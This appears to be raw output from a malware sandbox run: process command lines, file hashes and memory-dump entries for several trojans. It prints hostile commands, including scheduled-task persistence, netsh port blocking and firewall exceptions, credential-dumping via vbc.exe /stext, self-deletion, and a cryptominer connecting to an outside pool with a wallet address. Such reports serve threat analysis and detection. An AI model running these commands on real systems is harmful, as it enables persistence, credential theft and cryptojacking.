C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240629765.txt",MainThread
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\schtasks.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\Resources\Ease of Access Themes\schtasks.exe
"C:\Windows\Resources\Ease of Access Themes\schtasks.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 1340
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1372 -ip 1372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 448
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9757c46f8,0x7ff9757c4708,0x7ff9757c4718
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8
C:\Users\Admin\Downloads\HitmanPro_x64.exe
"C:\Users\Admin\Downloads\HitmanPro_x64.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3780 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2344 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
Files
memory/764-152-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/764-149-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-146-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/2336-121-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2336-120-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2908-109-0x00000000008B0000-0x00000000008C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/4828-58-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/1820-47-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
memory/3636-30-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4812-174-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/788-179-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/4812-211-0x0000000006370000-0x0000000006382000-memory.dmp
memory/4812-205-0x0000000005CB0000-0x00000000062C8000-memory.dmp
memory/788-204-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-213-0x0000000006390000-0x000000000649A000-memory.dmp
memory/788-218-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/4812-219-0x00000000064A0000-0x00000000064DC000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp
| MD5 | 28219e12dd6c55676bdf791833067e9d |
| SHA1 | a4c854d929404e5073d16610c62dfa331c9727a0 |
| SHA256 | d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540 |
| SHA512 | e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161 |
memory/4812-235-0x0000000006520000-0x000000000656C000-memory.dmp
memory/788-229-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
memory/788-184-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/788-185-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-176-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/4448-239-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/1492-265-0x0000000000140000-0x00000000001D4000-memory.dmp
memory/1492-301-0x0000000000980000-0x000000000098C000-memory.dmp
memory/1492-302-0x0000000000990000-0x000000000099A000-memory.dmp
memory/1492-325-0x00000000009B0000-0x00000000009BC000-memory.dmp
memory/4448-323-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-329-0x00000000060E0000-0x00000000064A2000-memory.dmp
